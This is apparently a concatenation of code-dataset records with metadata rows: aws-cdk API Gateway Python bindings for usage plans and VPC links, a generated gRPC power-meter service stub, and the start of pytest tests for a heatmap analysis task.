:param api_stages: API Stages to be associated with the usage plan. Default: none
:param description: A description of the purpose of the usage plan. Default: none
:param name: Name for this usage plan. Default: none
:param quota: Number of requests clients can make in a given time period. Default: none
:param throttle: Overall throttle settings for the API. Default: none
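
Example (a minimal sketch; assumes ``api`` is an existing ``RestApi`` whose
``deployment_stage`` is set, i.e. ``deploy`` was enabled)::

    plan = apigateway.UsagePlan(self, "basic",
        name="Basic",
        throttle=apigateway.ThrottleSettings(rate_limit=10, burst_limit=2))
    plan.add_api_stage(api=api, stage=api.deployment_stage)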
"""
props = UsagePlanProps(api_key=api_key, api_stages=api_stages, description=description, name=name, quota=quota, throttle=throttle)
jsii.create(UsagePlan, self, [scope, id, props])
@jsii.member(jsii_name="addApiKey")
def add_api_key(self, api_key: "IApiKey") -> None:
"""Adds an ApiKey.
:param api_key: -
"""
return jsii.invoke(self, "addApiKey", [api_key])
@jsii.member(jsii_name="addApiStage")
def add_api_stage(self, *, api: typing.Optional["IRestApi"]=None, stage: typing.Optional["Stage"]=None, throttle: typing.Optional[typing.List["ThrottlingPerMethod"]]=None) -> None:
"""Adds an apiStage.
:param api_stage: -
:param api: Default: none
:param stage: [disable-awslint:ref-via-interface]. Default: none
:param throttle: Default: none
"""
api_stage = UsagePlanPerApiStage(api=api, stage=stage, throttle=throttle)
return jsii.invoke(self, "addApiStage", [api_stage])
@property
@jsii.member(jsii_name="usagePlanId")
def usage_plan_id(self) -> str:
"""
attribute:
:attribute:: true
"""
return jsii.get(self, "usagePlanId")
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.UsagePlanPerApiStage", jsii_struct_bases=[], name_mapping={'api': 'api', 'stage': 'stage', 'throttle': 'throttle'})
class UsagePlanPerApiStage():
def __init__(self, *, api: typing.Optional["IRestApi"]=None, stage: typing.Optional["Stage"]=None, throttle: typing.Optional[typing.List["ThrottlingPerMethod"]]=None):
"""Represents the API stages that a usage plan applies to.
:param api: Default: none
:param stage: [disable-awslint:ref-via-interface]. Default: none
:param throttle: Default: none
"""
self._values = {
}
if api is not None: self._values["api"] = api
if stage is not None: self._values["stage"] = stage
if throttle is not None: self._values["throttle"] = throttle
@property
def api(self) -> typing.Optional["IRestApi"]:
"""
default
:default: none
"""
return self._values.get('api')
@property
def stage(self) -> typing.Optional["Stage"]:
"""[disable-awslint:ref-via-interface].
default
:default: none
"""
return self._values.get('stage')
@property
def throttle(self) -> typing.Optional[typing.List["ThrottlingPerMethod"]]:
"""
default
:default: none
"""
return self._values.get('throttle')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'UsagePlanPerApiStage(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.UsagePlanProps", jsii_struct_bases=[], name_mapping={'api_key': 'apiKey', 'api_stages': 'apiStages', 'description': 'description', 'name': 'name', 'quota': 'quota', 'throttle': 'throttle'})
class UsagePlanProps():
def __init__(self, *, api_key: typing.Optional["IApiKey"]=None, api_stages: typing.Optional[typing.List["UsagePlanPerApiStage"]]=None, description: typing.Optional[str]=None, name: typing.Optional[str]=None, quota: typing.Optional["QuotaSettings"]=None, throttle: typing.Optional["ThrottleSettings"]=None):
"""
:param api_key: ApiKey to be associated with the usage plan. Default: none
:param api_stages: API Stages to be associated with the usage plan. Default: none
:param description: A description of the purpose of the usage plan. Default: none
:param name: Name for this usage plan. Default: none
:param quota: Number of requests clients can make in a given time period. Default: none
:param throttle: Overall throttle settings for the API. Default: none
"""
if isinstance(quota, dict): quota = QuotaSettings(**quota)
if isinstance(throttle, dict): throttle = ThrottleSettings(**throttle)
self._values = {
}
if api_key is not None: self._values["api_key"] = api_key
if api_stages is not None: self._values["api_stages"] = api_stages
if description is not None: self._values["description"] = description
if name is not None: self._values["name"] = name
if quota is not None: self._values["quota"] = quota
if throttle is not None: self._values["throttle"] = throttle
@property
def api_key(self) -> typing.Optional["IApiKey"]:
"""ApiKey to be associated with the usage plan.
default
:default: none
"""
return self._values.get('api_key')
@property
def api_stages(self) -> typing.Optional[typing.List["UsagePlanPerApiStage"]]:
"""API Stages to be associated which the usage plan.
default
:default: none
"""
return self._values.get('api_stages')
@property
def description(self) -> typing.Optional[str]:
"""Represents usage plan purpose.
default
:default: none
"""
return self._values.get('description')
@property
def name(self) -> typing.Optional[str]:
"""Name for this usage plan.
default
:default: none
"""
return self._values.get('name')
@property
def quota(self) -> typing.Optional["QuotaSettings"]:
"""Number of requests clients can make in a given time period.
default
:default: none
"""
return self._values.get('quota')
@property
def throttle(self) -> typing.Optional["ThrottleSettings"]:
"""Overall throttle settings for the API.
default
:default: none
"""
return self._values.get('throttle')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'UsagePlanProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
class VpcLink(aws_cdk.core.Resource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.VpcLink"):
"""Define a new VPC Link Specifies an API Gateway VPC link for a RestApi to access resources in an Amazon Virtual Private Cloud (VPC)."""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, description: typing.Optional[str]=None, targets: typing.Optional[typing.List[aws_cdk.aws_elasticloadbalancingv2.INetworkLoadBalancer]]=None, vpc_link_name: typing.Optional[str]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param description: The description of the VPC link. Default: no description
:param targets: The network load balancers of the VPC targeted by the VPC link. The network load balancers must be owned by the same AWS account as the API owner. Default: - no targets. Use ``addTargets`` to add targets
:param vpc_link_name: The name used to label and identify the VPC link. Default: - automatically generated name
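
Example (a minimal sketch; ``nlb`` is a hypothetical
``aws_elasticloadbalancingv2.NetworkLoadBalancer`` in the target VPC)::

    link = apigateway.VpcLink(self, "link", targets=[nlb])
    # Targets can also be registered after construction:
    link.add_targets(nlb)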
"""
props = VpcLinkProps(description=description, targets=targets, vpc_link_name=vpc_link_name)
jsii.create(VpcLink, self, [scope, id, props])
@jsii.member(jsii_name="addTargets")
def add_targets(self, *targets: aws_cdk.aws_elasticloadbalancingv2.INetworkLoadBalancer) -> None:
"""
:param targets: -
"""
return jsii.invoke(self, "addTargets", [*targets])
@jsii.member(jsii_name="validate")
def _validate(self) -> typing.List[str]:
"""Validate the current construct.
This method can be implemented by derived constructs in order to perform
validation logic. It is called on all constructs before synthesis.
"""
return jsii.invoke(self, "validate", [])
@property
@jsii.member(jsii_name="vpcLinkId")
def vpc_link_id(self) -> str:
"""Physical ID of the VpcLink resource.
attribute:
:attribute:: true
"""
return jsii.get(self, "vpcLinkId")
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.VpcLinkProps", jsii_struct_bases=[], name_mapping={'description': 'description', 'targets': 'targets', 'vpc_link_name': 'vpcLinkName'})
class VpcLinkProps():
def __init__(self, *, description: typing.Optional[str]=None, targets: typing.Optional[typing.List[aws_cdk.aws_elasticloadbalancingv2.INetworkLoadBalancer]]=None, vpc_link_name: typing.Optional[str]=None):
"""Properties for a VpcLink.
:param description: The description of the VPC link. Default: no description
:param targets: The network load balancers of the VPC targeted by the VPC link. The network load balancers must be owned by the same AWS account as the API owner. Default: - no targets. Use ``addTargets`` to add targets
:param vpc_link_name: The name used to label and identify the VPC link. Default: - automatically generated name
"""
self._values = {
}
if description is not None: self._values["description"] = description
if targets is not None: self._values["targets"] = targets
if vpc_link_name is not None: self._values["vpc_link_name"] = vpc_link_name
@property
def description(self) -> typing.Optional[str]:
"""The description of the VPC link.
default
:default: no description
"""
return self._values.get('description')
@property
def targets(self) -> typing.Optional[typing.List[aws_cdk.aws_elasticloadbalancingv2.INetworkLoadBalancer]]:
"""The network load balancers of the VPC targeted by the VPC link. The network load balancers must be owned by the same AWS account of the API owner.
default
:default: - no targets. Use ``addTargets`` to add targets
"""
return self._values.get('targets')
@property
def vpc_link_name(self) -> typing.Optional[str]:
"""The name used to label and identify the VPC link.
default
:default: - automatically generated name
"""
return self._values.get('vpc_link_name')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'VpcLinkProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
__all__ = ["ApiKey", "ApiKeyProps", "ApiKeySourceType", "AuthorizationType", "AwsIntegration", "AwsIntegrationProps", "BasePathMapping", "BasePathMappingOptions", "BasePathMappingProps", "CfnAccount", "CfnAccountProps", "CfnApiKey", "CfnApiKeyProps", "CfnApiMappingV2", "CfnApiMappingV2Props", "CfnApiV2", "CfnApiV2Props", "CfnAuthorizer", "CfnAuthorizerProps", "CfnAuthorizerV2", "CfnAuthorizerV2Props", "CfnBasePathMapping", "CfnBasePathMappingProps", "CfnClientCertificate", "CfnClientCertificateProps", "CfnDeployment", "CfnDeploymentProps", "CfnDeploymentV2", "CfnDeploymentV2Props", "CfnDocumentationPart", "CfnDocumentationPartProps", "CfnDocumentationVersion", "CfnDocumentationVersionProps", "CfnDomainName", "CfnDomainNameProps", "CfnDomainNameV2", "CfnDomainNameV2Props", "CfnGatewayResponse", "CfnGatewayResponseProps", "CfnIntegrationResponseV2", "CfnIntegrationResponseV2Props", "CfnIntegrationV2", "CfnIntegrationV2Props", "CfnMethod", "CfnMethodProps", "CfnModel", "CfnModelProps", "CfnModelV2", "CfnModelV2Props", "CfnRequestValidator", "CfnRequestValidatorProps", "CfnResource", "CfnResourceProps", "CfnRestApi", "CfnRestApiProps", "CfnRouteResponseV2", "CfnRouteResponseV2Props", "CfnRouteV2", "CfnRouteV2Props", "CfnStage", "CfnStageProps", "CfnStageV2", "CfnStageV2Props", "CfnUsagePlan", "CfnUsagePlanKey", "CfnUsagePlanKeyProps", "CfnUsagePlanProps", "CfnVpcLink", "CfnVpcLinkProps", "ConnectionType", "ContentHandling", "Cors", "CorsOptions", "Deployment", "DeploymentProps", "DomainName", "DomainNameAttributes", "DomainNameOptions", "DomainNameProps", "EmptyModel", "EndpointType", "ErrorModel", "HttpIntegration", "HttpIntegrationProps", "IApiKey", "IAuthorizer", "IDomainName", "IModel", "IRequestValidator", "IResource", "IRestApi", "Integration", "IntegrationOptions", "IntegrationProps", "IntegrationResponse", "IntegrationType", "JsonSchema", "JsonSchemaType", "JsonSchemaVersion", "LambdaIntegration", "LambdaIntegrationOptions", "LambdaRestApi", "LambdaRestApiProps", "Method", "MethodDeploymentOptions", "MethodLoggingLevel", "MethodOptions", "MethodProps", "MethodResponse", "MockIntegration", "Model", "ModelOptions", "ModelProps", "PassthroughBehavior", "Period", "ProxyResource", "ProxyResourceOptions", "ProxyResourceProps", "QuotaSettings", "RequestValidator", "RequestValidatorOptions", "RequestValidatorProps", "Resource", "ResourceBase", "ResourceOptions", "ResourceProps", "RestApi", "RestApiProps", "Stage", "StageOptions", "StageProps", "ThrottleSettings", "ThrottlingPerMethod", "UsagePlan", "UsagePlanPerApiStage", "UsagePlanProps", "VpcLink", "VpcLinkProps", "__jsii_assembly__"]
publication.publish()
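
# --- Editor's note (added): hedged usage sketch, not part of the generated module. ---
# The keyword names below come from the properties defined above; the values are
# hypothetical, and a real stack would pass actual INetworkLoadBalancer instances.
def _example_vpc_link_props():
    return VpcLinkProps(
        vpc_link_name='my-vpc-link',          # optional: defaults to a generated name
        description='Link to internal NLBs',  # optional: defaults to no description
        # targets=[nlb],                      # optional: NLBs must be owned by the API owner's account
    )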
| 51.972905 | 2,629 | 0.703523 | 91,785 | 782,608 | 5.854933 | 0.016125 | 0.051999 | 0.014587 | 0.017953 | 0.89739 | 0.880825 | 0.860609 | 0.850724 | 0.838246 | 0.825426 | 0 | 0.002164 | 0.179781 | 782,608 | 15,057 | 2,630 | 51.976357 | 0.835017 | 0.431995 | 0 | 0.721412 | 0 | 0 | 0.158195 | 0.058347 | 0 | 0 | 0 | 0 | 0 | 1 | 0.273329 | false | 0.006956 | 0.002206 | 0.090601 | 0.555989 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 10 |
f2c4777307efdbe7b07cca23715fdd7c9a29521f | 92 | py | Python | modules/sensor_stat/__init__.py | srcc-msu/job_statistics | 74680a4e4c105ebcff94f089e07fcb44dbcc12d9 | [
"MIT"
] | null | null | null | modules/sensor_stat/__init__.py | srcc-msu/job_statistics | 74680a4e4c105ebcff94f089e07fcb44dbcc12d9 | [
"MIT"
] | null | null | null | modules/sensor_stat/__init__.py | srcc-msu/job_statistics | 74680a4e4c105ebcff94f089e07fcb44dbcc12d9 | [
"MIT"
] | null | null | null | from modules.sensor_stat import api_controllers
from modules.sensor_stat import controllers
| 30.666667 | 47 | 0.891304 | 13 | 92 | 6.076923 | 0.538462 | 0.278481 | 0.43038 | 0.531646 | 0.683544 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086957 | 92 | 2 | 48 | 46 | 0.940476 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
4b53c479c9aae3f73adcfe7a59ed6ba681ba8b91 | 13,257 | py | Python | instrosetta/interfaces/light_analysis/power_meter_pb2_grpc.py | jmosbacher/instrosetta-python | b323ee4d3db0b7d8e22ec731dac521c967e5323d | [
"MIT"
] | null | null | null | instrosetta/interfaces/light_analysis/power_meter_pb2_grpc.py | jmosbacher/instrosetta-python | b323ee4d3db0b7d8e22ec731dac521c967e5323d | [
"MIT"
] | null | null | null | instrosetta/interfaces/light_analysis/power_meter_pb2_grpc.py | jmosbacher/instrosetta-python | b323ee4d3db0b7d8e22ec731dac521c967e5323d | [
"MIT"
] | null | null | null | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from instrosetta.interfaces.light_analysis import power_meter_pb2 as instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2
class PowerMeterStub(object):
  # missing associated documentation comment in .proto file
  pass

  def __init__(self, channel):
    """Constructor.

    Args:
      channel: A grpc.Channel.
    """
    self.Initialize = channel.unary_unary(
        '/instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter/Initialize',
        request_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.InitializeRequest.SerializeToString,
        response_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.InitializeResponse.FromString,
        )
    self.Shutdown = channel.unary_unary(
        '/instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter/Shutdown',
        request_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.ShutdownRequest.SerializeToString,
        response_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.ShutdownResponse.FromString,
        )
    self.GetPower = channel.unary_unary(
        '/instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter/GetPower',
        request_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetPowerRequest.SerializeToString,
        response_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetPowerResponse.FromString,
        )
    self.SetPower = channel.unary_unary(
        '/instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter/SetPower',
        request_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetPowerRequest.SerializeToString,
        response_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetPowerResponse.FromString,
        )
    self.GetCount = channel.unary_unary(
        '/instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter/GetCount',
        request_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetCountRequest.SerializeToString,
        response_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetCountResponse.FromString,
        )
    self.SetCount = channel.unary_unary(
        '/instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter/SetCount',
        request_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetCountRequest.SerializeToString,
        response_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetCountResponse.FromString,
        )
    self.GetWavelength = channel.unary_unary(
        '/instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter/GetWavelength',
        request_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetWavelengthRequest.SerializeToString,
        response_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetWavelengthResponse.FromString,
        )
    self.SetWavelength = channel.unary_unary(
        '/instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter/SetWavelength',
        request_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetWavelengthRequest.SerializeToString,
        response_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetWavelengthResponse.FromString,
        )
    self.GetMode = channel.unary_unary(
        '/instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter/GetMode',
        request_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetModeRequest.SerializeToString,
        response_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetModeResponse.FromString,
        )
    self.SetMode = channel.unary_unary(
        '/instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter/SetMode',
        request_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetModeRequest.SerializeToString,
        response_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetModeResponse.FromString,
        )
    self.GetAutorange = channel.unary_unary(
        '/instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter/GetAutorange',
        request_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetAutorangeRequest.SerializeToString,
        response_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetAutorangeResponse.FromString,
        )
    self.SetAutorange = channel.unary_unary(
        '/instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter/SetAutorange',
        request_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetAutorangeRequest.SerializeToString,
        response_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetAutorangeResponse.FromString,
        )
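
# --- Editor's note (added): hedged client-side usage sketch, not generated code. ---
# Each attribute set in __init__ above is a callable unary-unary RPC. The request
# class names come from power_meter_pb2 (imported above); their fields are not
# visible in this file, so an empty request is used here; the target address is an
# illustrative assumption.
def _example_client(target='localhost:50051'):
  channel = grpc.insecure_channel(target)
  stub = PowerMeterStub(channel)
  response = stub.GetPower(
      instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetPowerRequest())
  return response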
class PowerMeterServicer(object):
  # missing associated documentation comment in .proto file
  pass

  def Initialize(self, request, context):
    # missing associated documentation comment in .proto file
    pass
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')

  def Shutdown(self, request, context):
    # missing associated documentation comment in .proto file
    pass
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')

  def GetPower(self, request, context):
    # missing associated documentation comment in .proto file
    pass
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')

  def SetPower(self, request, context):
    # missing associated documentation comment in .proto file
    pass
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')

  def GetCount(self, request, context):
    # missing associated documentation comment in .proto file
    pass
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')

  def SetCount(self, request, context):
    # missing associated documentation comment in .proto file
    pass
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')

  def GetWavelength(self, request, context):
    # missing associated documentation comment in .proto file
    pass
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')

  def SetWavelength(self, request, context):
    # missing associated documentation comment in .proto file
    pass
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')

  def GetMode(self, request, context):
    # missing associated documentation comment in .proto file
    pass
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')

  def SetMode(self, request, context):
    # missing associated documentation comment in .proto file
    pass
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')

  def GetAutorange(self, request, context):
    # missing associated documentation comment in .proto file
    pass
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')

  def SetAutorange(self, request, context):
    # missing associated documentation comment in .proto file
    pass
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')
def add_PowerMeterServicer_to_server(servicer, server):
  rpc_method_handlers = {
      'Initialize': grpc.unary_unary_rpc_method_handler(
          servicer.Initialize,
          request_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.InitializeRequest.FromString,
          response_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.InitializeResponse.SerializeToString,
      ),
      'Shutdown': grpc.unary_unary_rpc_method_handler(
          servicer.Shutdown,
          request_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.ShutdownRequest.FromString,
          response_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.ShutdownResponse.SerializeToString,
      ),
      'GetPower': grpc.unary_unary_rpc_method_handler(
          servicer.GetPower,
          request_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetPowerRequest.FromString,
          response_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetPowerResponse.SerializeToString,
      ),
      'SetPower': grpc.unary_unary_rpc_method_handler(
          servicer.SetPower,
          request_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetPowerRequest.FromString,
          response_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetPowerResponse.SerializeToString,
      ),
      'GetCount': grpc.unary_unary_rpc_method_handler(
          servicer.GetCount,
          request_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetCountRequest.FromString,
          response_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetCountResponse.SerializeToString,
      ),
      'SetCount': grpc.unary_unary_rpc_method_handler(
          servicer.SetCount,
          request_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetCountRequest.FromString,
          response_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetCountResponse.SerializeToString,
      ),
      'GetWavelength': grpc.unary_unary_rpc_method_handler(
          servicer.GetWavelength,
          request_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetWavelengthRequest.FromString,
          response_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetWavelengthResponse.SerializeToString,
      ),
      'SetWavelength': grpc.unary_unary_rpc_method_handler(
          servicer.SetWavelength,
          request_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetWavelengthRequest.FromString,
          response_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetWavelengthResponse.SerializeToString,
      ),
      'GetMode': grpc.unary_unary_rpc_method_handler(
          servicer.GetMode,
          request_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetModeRequest.FromString,
          response_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetModeResponse.SerializeToString,
      ),
      'SetMode': grpc.unary_unary_rpc_method_handler(
          servicer.SetMode,
          request_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetModeRequest.FromString,
          response_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetModeResponse.SerializeToString,
      ),
      'GetAutorange': grpc.unary_unary_rpc_method_handler(
          servicer.GetAutorange,
          request_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetAutorangeRequest.FromString,
          response_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.GetAutorangeResponse.SerializeToString,
      ),
      'SetAutorange': grpc.unary_unary_rpc_method_handler(
          servicer.SetAutorange,
          request_deserializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetAutorangeRequest.FromString,
          response_serializer=instrosetta_dot_interfaces_dot_light__analysis_dot_power__meter__pb2.SetAutorangeResponse.SerializeToString,
      ),
  }
  generic_handler = grpc.method_handlers_generic_handler(
      'instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter', rpc_method_handlers)
  server.add_generic_rpc_handlers((generic_handler,))
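
# --- Editor's note (added): hedged server-side wiring sketch, not generated code. ---
# A concrete implementation would subclass PowerMeterServicer and override its
# methods. The thread-pool size and port are illustrative assumptions;
# wait_for_termination() requires a reasonably recent grpcio release.
def _example_serve():
  from concurrent import futures
  server = grpc.server(futures.ThreadPoolExecutor(max_workers=4))
  add_PowerMeterServicer_to_server(PowerMeterServicer(), server)
  server.add_insecure_port('[::]:50051')
  server.start()
  server.wait_for_termination()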
| 56.653846 | 139 | 0.807951 | 1,408 | 13,257 | 7.06179 | 0.073864 | 0.08237 | 0.065373 | 0.133058 | 0.867143 | 0.867143 | 0.867143 | 0.821281 | 0.815649 | 0.815649 | 0 | 0.005468 | 0.130874 | 13,257 | 233 | 140 | 56.896996 | 0.85749 | 0.067813 | 0 | 0.321244 | 1 | 0 | 0.131684 | 0.077647 | 0 | 0 | 0 | 0 | 0 | 1 | 0.072539 | false | 0.072539 | 0.010363 | 0 | 0.093264 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
4b689eb0ab3a46b758282dff494672894cd2b6b3 | 11,764 | py | Python | tests/unit/analytics/heatmap/test_main.py | thehyve/Fractalis | 5591112e5bc994eea5baf3d28caa7e5dfee85a57 | [
"Apache-2.0"
] | 7 | 2018-06-01T12:17:26.000Z | 2019-08-23T13:15:34.000Z | tests/unit/analytics/heatmap/test_main.py | thehyve/Fractalis | 5591112e5bc994eea5baf3d28caa7e5dfee85a57 | [
"Apache-2.0"
] | 6 | 2018-11-02T10:00:04.000Z | 2021-09-13T14:15:36.000Z | tests/unit/analytics/heatmap/test_main.py | LCSB-BioCore/Fractalis | a9f7f8da7675b55c5996d2f32d7baa7313b0350e | [
"Apache-2.0"
] | 3 | 2018-08-02T16:42:50.000Z | 2018-12-14T18:16:22.000Z | """This module provides tests for the heatmap analysis main module."""
import pytest
import pandas as pd
import numpy as np
from fractalis.analytics.tasks.heatmap.main import HeatmapTask
# noinspection PyMissingTypeHints
class TestHeatmap:
    task = HeatmapTask()

    def test_functional(self):
        numerical_arrays = [
            pd.DataFrame([[101, 'foo', 5], [101, 'bar', 6], [102, 'foo', 10],
                          [102, 'bar', 11], [103, 'foo', 15], [103, 'bar', 16],
                          [104, 'foo', 20], [104, 'bar', 21]],
                         columns=['id', 'feature', 'value'])
        ]
        subsets = [[101, 102], [103, 104]]
        result = self.task.main(numerical_arrays=numerical_arrays,
                                numericals=[],
                                categoricals=[],
                                ranking_method='B',
                                params={},
                                id_filter=[],
                                max_rows=100,
                                subsets=subsets)
        assert 'data' in result
        assert 'stats' in result

    def test_functional_with_nans_and_missing(self):
        numerical_arrays = [
            pd.DataFrame([[101, 'foo', 5], [101, 'bar', 5],
                          [102, 'foo', 10],
                          [103, 'foo', float('nan')], [103, 'bar', 15],
                          [104, 'foo', 20], [104, 'bar', 20]],
                         columns=['id', 'feature', 'value'])
        ]
        subsets = [[101, 102], [103, 104]]
        result = self.task.main(numerical_arrays=numerical_arrays,
                                numericals=[],
                                categoricals=[],
                                ranking_method='B',
                                params={},
                                id_filter=[],
                                max_rows=100,
                                subsets=subsets)
        for stat in result['stats']:
            if stat != 'feature' and stat != 'AveExpr':
                assert result['stats'][stat][0] == result['stats'][stat][1]

    def test_main_raises_if_invalid_data(self):
        numerical_arrays = [
            pd.DataFrame([[101, 'foo', 5], [101, 'bar', 6], [102, 'foo', 10],
